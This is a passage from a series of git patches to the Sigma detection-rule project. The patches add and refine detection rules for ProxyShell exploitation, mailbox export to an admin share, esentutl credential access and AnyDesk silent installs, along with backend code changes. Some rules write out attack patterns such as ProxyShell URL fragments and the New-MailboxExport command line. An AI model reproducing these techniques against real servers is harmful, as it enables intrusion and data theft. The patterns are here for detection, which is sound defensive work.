winlog.event_data.SourceLine SourceTag: winlog.event_data.SourceTag CallStack: winlog.event_data.CallStack + # + # Microsoft-Windows-Windows Defender/Operational + # + Action ID: winlog.event_data.Action ID + Action Name: winlog.event_data.Action Name + Additional Actions ID: winlog.event_data.Additional Actions ID + Additional Actions String: winlog.event_data.Additional Actions String + Category ID: winlog.event_data.Category ID + Category Name: winlog.event_data.Category Name + Detection ID: winlog.event_data.Detection ID + Detection Time: winlog.event_data.Detection Time + Detection User: winlog.event_data.Detection User + Engine Version: winlog.event_data.Engine Version + Error Code: winlog.event_data.Error Code + Error Description: winlog.event_data.Error Description + Execution ID: winlog.event_data.Execution ID + Execution Name: winlog.event_data.Execution Name + FWLink: winlog.event_data.FWLink + New Value: winlog.event_data.New Value + Old Value: winlog.event_data.Old Value + Origin ID: winlog.event_data.Origin ID + Origin Name: winlog.event_data.Origin Name + Path: winlog.event_data.Path + Post Clean Status: winlog.event_data.Post Clean Status + Pre Execution Status: winlog.event_data.Pre Execution Status + Process Name: winlog.event_data.Process Name + Product Name: winlog.event_data.Product Name + Product Version: winlog.event_data.Product Version + Remediation User: winlog.event_data.Remediation User + Security intelligence Version: winlog.event_data.Security intelligence Version + Severity ID: winlog.event_data.Severity ID + Severity Name: winlog.event_data.Severity Name + Source ID: winlog.event_data.Source ID + Source Name: winlog.event_data.Source Name + Status Code: winlog.event_data.Status Code + Status Description: winlog.event_data.Status Description + Threat ID: winlog.event_data.Threat ID + Threat Name: winlog.event_data.Threat Name + Type ID: winlog.event_data.Type ID + Type Name: winlog.event_data.Type Name From b7e301b6396826ea70ed82c329fc36abd8664e6d Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Fri, 6 Aug 2021 11:46:00 +0200 Subject: [PATCH 0192/1367] add field selection to sql backend option --- tools/sigma/backends/sql.py | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index bc55a1ba..cd0b8647 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -48,6 +48,8 @@ class SQLBackend(SingleTextQueryBackend): ("table", False, "Use this option to specify table name, default is \"eventlog\"", None), ) + + def __init__(self, sigmaconfig, options): super().__init__(sigmaconfig) if "table" in options: @@ -55,6 +57,11 @@ class SQLBackend(SingleTextQueryBackend): else: self.table = "eventlog" + if "select" in options: + self.select_fields = options["select"].split(',') + else: + self.select_fields = list() + def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] @@ -188,13 +195,17 @@ class SQLBackend(SingleTextQueryBackend): if self._recursiveFtsSearch(parsed.parsedSearch): raise NotImplementedError("FullTextSearch not implemented for SQL Backend.") result = self.generateNode(parsed.parsedSearch) + select = "*" + + if self.select_fields: + select = ", ".join(self.select_fields) if parsed.parsedAgg: #Handle aggregation fro, whe = self.generateAggregation(parsed.parsedAgg, result) - return "SELECT * FROM {} WHERE {}".format(fro, whe) + return "SELECT {} FROM {} WHERE {}".format(select, fro, whe) - return "SELECT * FROM {} WHERE {}".format(self.table, result) + return "SELECT {} FROM {} WHERE {}".format(select, self.table, result) def _recursiveFtsSearch(self, subexpression): #True: found subexpression, where no fieldname is requested -> full text search @@ -228,4 +239,4 @@ class SQLBackend(SingleTextQueryBackend): if isinstance(subexpression.items, NodeSubexpression): return self._recursiveFtsSearch(subexpression.items) elif type(subexpression.items) in [ConditionAND, ConditionOR, ConditionNOT]: - return _evaluateCondition(subexpression.items) \ No newline at end of file + return _evaluateCondition(subexpression.items) From 516e1ade6d68b225fbf7224409fcf36a38cdf1dd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=A1n=20Tren=C4=8Dansk=C3=BD?= Date: Fri, 6 Aug 2021 14:06:35 +0200 Subject: [PATCH 0193/1367] Silent installation of AnyDesk --- .../win_anydesk_silent_install.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/win_anydesk_silent_install.yml diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml new file mode 100644 index 00000000..6b3ad6f0 --- /dev/null +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -0,0 +1,31 @@ +title: AnyDesk silent installation +id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 +status: experimental +author: Ján Trenčanský +date: 2021/08/06 +description: AnyDesk Remote Desktop silent installation can be used by attacker to gain remote access. +references: + - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20 + - https://support.anydesk.com/Automatic_Deployment +tags: + - attack.t1219 +logsource: + category: process_creation + product: windows +detection: + selection_anydesk: + CommandLine|contains: 'anydesk.exe' + selection_install: + CommandLine|contains: '--install' + selection_with_win: + CommandLine|contains: '--start-with-win' + selection_silent: + CommandLine|contains: '--silent' + condition: all of them +falsepositives: + - Legitimate deployment of AnyDesk +level: medium +fields: + - CommandLine + - ParentCommandLine + - CurrentDirectory From 2f3b48c347b8c7786ca12e9bb0e2a5627135a27f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=A1n=20Tren=C4=8Dansk=C3=BD?= Date: Fri, 6 Aug 2021 14:18:30 +0200 Subject: [PATCH 0194/1367] Fix title --- rules/windows/process_creation/win_anydesk_silent_install.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml index 6b3ad6f0..c3e334f9 100644 --- a/rules/windows/process_creation/win_anydesk_silent_install.yml +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -1,4 +1,4 @@ -title: AnyDesk silent installation +title: AnyDesk Silent Installation id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 status: experimental author: Ján Trenčanský From e02b85dc9944b862cfc2142d551abbf6235f632e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 6 Aug 2021 18:41:14 +0200 Subject: [PATCH 0195/1367] '--start-with-win' is pretty specific --- .../process_creation/win_anydesk_silent_install.yml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml index c3e334f9..da9c8159 100644 --- a/rules/windows/process_creation/win_anydesk_silent_install.yml +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -14,17 +14,14 @@ logsource: product: windows detection: selection_anydesk: - CommandLine|contains: 'anydesk.exe' - selection_install: - CommandLine|contains: '--install' - selection_with_win: - CommandLine|contains: '--start-with-win' - selection_silent: - CommandLine|contains: '--silent' + CommandLine|contains|all: + - '--install' + - '--start-with-win' + - '--silent' condition: all of them falsepositives: - Legitimate deployment of AnyDesk -level: medium +level: high fields: - CommandLine - ParentCommandLine From d69e2333c892f9fd333aa2cbaa24c464d27925b5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 6 Aug 2021 18:44:54 +0200 Subject: [PATCH 0196/1367] various fixes --- .../windows/process_creation/Conti_esentutl.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/Conti_esentutl.yaml b/rules/windows/process_creation/Conti_esentutl.yaml index 7a29a633..91f75ab4 100644 --- a/rules/windows/process_creation/Conti_esentutl.yaml +++ b/rules/windows/process_creation/Conti_esentutl.yaml @@ -1,12 +1,12 @@ -title: Detection of esentutl aka Extensible Storage Engine Utilities to gather credentials +title: Esentutl Gather Credentials id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 status: experimental author: sam0x90 date: 2021/08/06 -description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module "pwgrab" +description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. references: - https://twitter.com/vxunderground/status/1423336151860002816 - - https://attack.mitre.org/software/S0404/ + - https://attack.mitre.org/software/S0404/ - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ tags: - attack.credential_access @@ -17,16 +17,15 @@ logsource: product: windows detection: selection: - CommandLine|contains: + CommandLine|contains|all: - 'esentutl' - selection_password: - CommandLine|contains: ' /p' + - ' /p' condition: all of them falsepositives: - To be determined level: medium fields: - User - - CommandLine + - CommandLine - ParentCommandLine - - CurrentDirectory \ No newline at end of file + - CurrentDirectory From 7de55075f7556b07d33d0c29b3d3acd670b7f97b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 6 Aug 2021 18:45:38 +0200 Subject: [PATCH 0197/1367] fix: condition --- rules/windows/process_creation/win_anydesk_silent_install.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml index da9c8159..4cf3b46e 100644 --- a/rules/windows/process_creation/win_anydesk_silent_install.yml +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -13,12 +13,12 @@ logsource: category: process_creation product: windows detection: - selection_anydesk: + selection: CommandLine|contains|all: - '--install' - '--start-with-win' - '--silent' - condition: all of them + condition: selection falsepositives: - Legitimate deployment of AnyDesk level: high From c0360cd1cafcef2836d83d0a50bae76fb2c91f64 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 6 Aug 2021 18:53:08 +0200 Subject: [PATCH 0198/1367] change name and line breaks --- ...yaml => process_susp_esentutl_params.yaml} | 62 +++++++++---------- 1 file changed, 31 insertions(+), 31 deletions(-) rename rules/windows/process_creation/{Conti_esentutl.yaml => process_susp_esentutl_params.yaml} (96%) diff --git a/rules/windows/process_creation/Conti_esentutl.yaml b/rules/windows/process_creation/process_susp_esentutl_params.yaml similarity index 96% rename from rules/windows/process_creation/Conti_esentutl.yaml rename to rules/windows/process_creation/process_susp_esentutl_params.yaml index 91f75ab4..598525ac 100644 --- a/rules/windows/process_creation/Conti_esentutl.yaml +++ b/rules/windows/process_creation/process_susp_esentutl_params.yaml @@ -1,31 +1,31 @@ -title: Esentutl Gather Credentials -id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 -status: experimental -author: sam0x90 -date: 2021/08/06 -description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. -references: - - https://twitter.com/vxunderground/status/1423336151860002816 - - https://attack.mitre.org/software/S0404/ - - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ -tags: - - attack.credential_access - - attack.t1003 - - attack.t1003.003 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - 'esentutl' - - ' /p' - condition: all of them -falsepositives: - - To be determined -level: medium -fields: - - User - - CommandLine - - ParentCommandLine - - CurrentDirectory +title: Esentutl Gather Credentials +id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 +status: experimental +author: sam0x90 +date: 2021/08/06 +description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. +references: + - https://twitter.com/vxunderground/status/1423336151860002816 + - https://attack.mitre.org/software/S0404/ + - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ +tags: + - attack.credential_access + - attack.t1003 + - attack.t1003.003 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'esentutl' + - ' /p' + condition: all of them +falsepositives: + - To be determined +level: medium +fields: + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory From 2333defde7630a572a30616a030ec0b9713e3f97 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 7 Aug 2021 08:24:36 +0200 Subject: [PATCH 0199/1367] add hash_normalise option --- tools/sigma/backends/elasticsearch.py | 41 ++++++++++++++++++++------- 1 file changed, 30 insertions(+), 11 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index b00a1107..0f1a3616 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -68,6 +68,7 @@ class ElasticsearchWildcardHandlingMixin(object): ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), + ("hash_normalise", None, "Normalise hash field to lower , upper or both. If not use field is a normal field. Valid options are: lower/upper/both", None), ) reContainsWildcard = re.compile("(?:(? Date: Sat, 7 Aug 2021 02:11:11 -0500 Subject: [PATCH 0200/1367] Create azure_kubernetes_secret_or_config_object_access.yml --- ...ernetes_secret_or_config_object_access.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml new file mode 100644 index 00000000..b2ab6e38 --- /dev/null +++ b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml @@ -0,0 +1,25 @@ +title: Azure Kubernetes Secret or Config Object Access +id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection1: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE + selection2: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE + selection3: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE + selection4: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE + condition: selection1 or selection2 or selection3 or selection4 +level: medium +tags: + - attack.impact +falsepositives: +- Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 210ca90d480de1625a10caf42229bd9afc4bfa8d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 02:11:47 -0500 Subject: [PATCH 0201/1367] Delete azure_kubernetes_secret_or_config_object_access.yml --- ...ernetes_secret_or_config_object_access.yml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml deleted file mode 100644 index b2ab6e38..00000000 --- a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: Azure Kubernetes Secret or Config Object Access -id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c -description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. -author: Austin Songer -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection1: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE - selection2: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE - selection3: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE - selection4: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE - condition: selection1 or selection2 or selection3 or selection4 -level: medium -tags: - - attack.impact -falsepositives: -- Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 1ac49a2055ac9ef0d196d4846176ae13e4d6698c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 7 Aug 2021 09:22:24 +0200 Subject: [PATCH 0202/1367] rule: ProxyShell patterns --- rules/web/web_exchange_proxyshell.yml | 32 +++++++++++++++++++ .../process_mailboxexport_share.yaml | 25 +++++++++++++++ 2 files changed, 57 insertions(+) create mode 100644 rules/web/web_exchange_proxyshell.yml create mode 100644 rules/windows/process_creation/process_mailboxexport_share.yaml diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml new file mode 100644 index 00000000..2b19fe2b --- /dev/null +++ b/rules/web/web_exchange_proxyshell.yml @@ -0,0 +1,32 @@ +title: Exchange ProxyShell Pattern +id: 23eee45e-933b-49f9-ae1b-df706d2d52ef +status: experimental +description: Detects URP patterns that could be found in ProxyShell exloitation attempts against Exchange servers +references: + - https://youtu.be/5mqid-7zp8k?t=2231 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html +author: Florian Roth +date: 2020/08/07 +tags: + - attack.initial_access +logsource: + category: webserver + +detection: + selection1: + c-uri|contains|all: + - '/autodiscover/autodiscover.json?' + - '%3f@' + selection2: + c-uri|contains: + # since we don't know how it will appear in the log files, we'll just use all versions + - 'autodiscover.json?@' + - 'autodiscover.json%3f@' + - '%3f@foo.com' + - 'Email=autodiscover/autodiscover.json' + - 'json?@foo.com' + - 'autodiscover.json?@' + condition: 1 of them +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/process_mailboxexport_share.yaml b/rules/windows/process_creation/process_mailboxexport_share.yaml new file mode 100644 index 00000000..77bc04c2 --- /dev/null +++ b/rules/windows/process_creation/process_mailboxexport_share.yaml @@ -0,0 +1,25 @@ +title: Suspicious MailboxExport to Share +id: 889719ef-dd62-43df-86c3-768fb08dc7c0 +status: experimental +description: Detects a PowerShell New-MailboxExportRequest that exports a mailbox to a local share, as used in ProxyShell exploitations +references: + - https://youtu.be/5mqid-7zp8k?t=2481 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html +author: Florian Roth +date: 2021/08/07 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'New-MailboxExport' + - ' -Mailbox ' + - ' -FilePath \\127.0.0.1\C$' + condition: selection +falsepositives: + - unknown +level: critical +fields: + - CommandLine + - ParentCommandLine From 5f89a29ea7c89fc365f570df4ddc2cfe0c9ee906 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 7 Aug 2021 10:01:23 +0200 Subject: [PATCH 0203/1367] fix file name --- ...s_mailboxexport_share.yaml => process_mailboxexport_share.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{process_mailboxexport_share.yaml => process_mailboxexport_share.yml} (100%) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yaml b/rules/windows/process_creation/process_mailboxexport_share.yml similarity index 100% rename from rules/windows/process_creation/process_mailboxexport_share.yaml rename to rules/windows/process_creation/process_mailboxexport_share.yml From 0a8904a61e7448ed41d63ff9bd0d076e1d634cba Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 7 Aug 2021 10:10:12 +0200 Subject: [PATCH 0204/1367] fix: issues with new rule --- rules/web/web_exchange_proxyshell.yml | 5 ++-- .../process_mailboxexport_share.yml | 26 +++++++++++++++++++ 2 files changed, 28 insertions(+), 3 deletions(-) create mode 100644 rules/windows/process_creation/process_mailboxexport_share.yml diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index 2b19fe2b..a838600a 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -5,18 +5,18 @@ description: Detects URP patterns that could be found in ProxyShell exloitation references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 author: Florian Roth date: 2020/08/07 tags: - attack.initial_access logsource: category: webserver - detection: selection1: c-uri|contains|all: - '/autodiscover/autodiscover.json?' - - '%3f@' + - '/powershell' selection2: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions @@ -25,7 +25,6 @@ detection: - '%3f@foo.com' - 'Email=autodiscover/autodiscover.json' - 'json?@foo.com' - - 'autodiscover.json?@' condition: 1 of them falsepositives: - Unknown diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml new file mode 100644 index 00000000..cf828c85 --- /dev/null +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -0,0 +1,26 @@ +title: Suspicious MailboxExport to Share +id: 889719ef-dd62-43df-86c3-768fb08dc7c0 +status: experimental +description: Detects a PowerShell New-MailboxExportRequest that exports a mailbox to a local share, as used in ProxyShell exploitations +references: + - https://youtu.be/5mqid-7zp8k?t=2481 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 +author: Florian Roth +date: 2021/08/07 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'New-MailboxExport' + - ' -Mailbox ' + - ' -FilePath \\127.0.0.1\C$' + condition: selection +falsepositives: + - unknown +level: critical +fields: + - CommandLine + - ParentCommandLine From 88a721a1ab39c2264a499d3cb2a7405e96ee361c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 7 Aug 2021 10:13:05 +0200 Subject: [PATCH 0205/1367] docs: add space in title --- rules/windows/process_creation/process_mailboxexport_share.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index cf828c85..da6aba61 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -1,4 +1,4 @@ -title: Suspicious MailboxExport to Share +title: Suspicious PowerShell Mailbox Export to Share id: 889719ef-dd62-43df-86c3-768fb08dc7c0 status: experimental description: Detects a PowerShell New-MailboxExportRequest that exports a mailbox to a local share, as used in ProxyShell exploitations From f7d116a4722bc3da25edce88a61cb9b3fd58a2b2 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Sat, 7 Aug 2021 10:32:12 +0200 Subject: [PATCH 0206/1367] Add a sigma2CSV tool to convert rules to CSV for stats purpose #1787 --- contrib/sigma2CSV.py | 63 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 contrib/sigma2CSV.py diff --git a/contrib/sigma2CSV.py b/contrib/sigma2CSV.py new file mode 100644 index 00000000..b2c99d66 --- /dev/null +++ b/contrib/sigma2CSV.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 +# Copyright 2021 wagga40 (https://github.com/wagga40) +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . +""" +Project: sigma2CSV.py +Date: 07 aug 2021 +Author: wagga40 (https://github.com/wagga40) +Version: 1.0 +Description: + Asked by frak113 in issue #1787 (https://github.com/SigmaHQ/sigma/issues/1787#issuecomment-894618060) + This script converts sigma rules to a CSV format for statistics puprpose. + For now, it only keeps title, description, level, tags and author fields. + Feel free to modify it according to your needs. +Requirements: + $ pip install pyyaml +""" + +import yaml +import glob +import argparse + +parser = argparse.ArgumentParser() +parser.add_argument("-r", "--rulesdirectory", help="Sub-directory generated by rules-search", required=True, type=str) +parser.add_argument("-f", "--fileext", help="Rule file extension", default="yml", type=str) +parser.add_argument("-d", "--delimiter", help="Separator", default=",", type=str) +parser.add_argument("--oneline", help="Put all tags on a single line", action="store_true") +args = parser.parse_args() + +files = glob.glob(args.rulesdirectory + "/**/*." + args.fileext, recursive=True) +# for each file in the given directory +for file in files: + d={} + with open(file, 'r') as stream: + docs = yaml.load_all(stream, Loader=yaml.FullLoader) + for doc in docs: + for k,v in doc.items(): + if k in ['title','description','tags','level','author']: # Modify here if you want to include other fields + d[k]=v + # Check for optional fields + if "author" not in d: d["author"]="" + if "level" not in d: d["level"]="" + if args.oneline: # All tags will be on a single line + if "tags" in d: + expandTags = args.delimiter.join([ tags for tags in d["tags"] if "attack" in tags ]) # Only output attack related tags + print(f'{d["title"]}{args.delimiter}{d["description"]}{args.delimiter}{d["level"]}{args.delimiter}{d["author"]}{args.delimiter}{expandTags}') + else: + print(f'{d["title"]}{args.delimiter}{d["description"]}{args.delimiter}{d["level"]}{args.delimiter}{d["author"]}') + else: + if "tags" in d: + for tag in d["tags"]: + if "attack" in tag: # Only output attack related tags + print(f'{d["title"]}{args.delimiter}{d["description"]}{args.delimiter}{d["level"]}{args.delimiter}{d["author"]}{args.delimiter}{tag}') \ No newline at end of file From f6980edc66373f1c613da074746aaccc0a72adbb Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 7 Aug 2021 11:16:24 +0200 Subject: [PATCH 0207/1367] fix english : normalize --- tools/sigma/backends/elasticsearch.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 0f1a3616..e19fa104 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -68,7 +68,7 @@ class ElasticsearchWildcardHandlingMixin(object): ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), - ("hash_normalise", None, "Normalise hash field to lower , upper or both. If not use field is a normal field. Valid options are: lower/upper/both", None), + ("hash_normalize", None, "Normalize hash fields to lowercase, uppercase or both. If this option is not used the field value stays untouched. Valid options are: lower/upper/both (default: both)", None), ) reContainsWildcard = re.compile("(?:(? Date: Sat, 7 Aug 2021 11:22:44 +0200 Subject: [PATCH 0208/1367] fix: more changes to incomplete windivert rule --- rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml | 3 --- ...l_driver_load copy.yml => sysmon_windivert_driver_load.yml} | 0 2 files changed, 3 deletions(-) rename rules/windows/driver_load/{sysmon_vuln_dell_driver_load copy.yml => sysmon_windivert_driver_load.yml} (100%) diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml index 39517aa8..21868b8a 100644 --- a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml +++ b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml @@ -21,9 +21,6 @@ detection: - 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1' - '10b30bdee43b3a2ec4aa63375577ade650269d25' - 'd2fd132ab7bbc6bbb87a84f026fa0244' - - - condition: selection_image or selection_hash falsepositives: - legitimate BIOS driver updates (should be rare) diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml b/rules/windows/driver_load/sysmon_windivert_driver_load.yml similarity index 100% rename from rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml rename to rules/windows/driver_load/sysmon_windivert_driver_load.yml From 4c3a7007e682ea00673972e85755b7c68bab5993 Mon Sep 17 00:00:00 2001 From: Lei Chen Date: Sat, 7 Aug 2021 21:13:19 +0800 Subject: [PATCH 0209/1367] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3fb50937..864235a6 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -[![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master)](https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster) +[![sigma build status](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master)](https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster) ![sigma_logo](./images/Sigma_0.3.png) From 07d21c58e823b7c99fa8bb159228a7bda42476b2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 7 Aug 2021 15:49:25 +0200 Subject: [PATCH 0210/1367] Update process_susp_esentutl_params.yaml --- .../windows/process_creation/process_susp_esentutl_params.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_susp_esentutl_params.yaml b/rules/windows/process_creation/process_susp_esentutl_params.yaml index 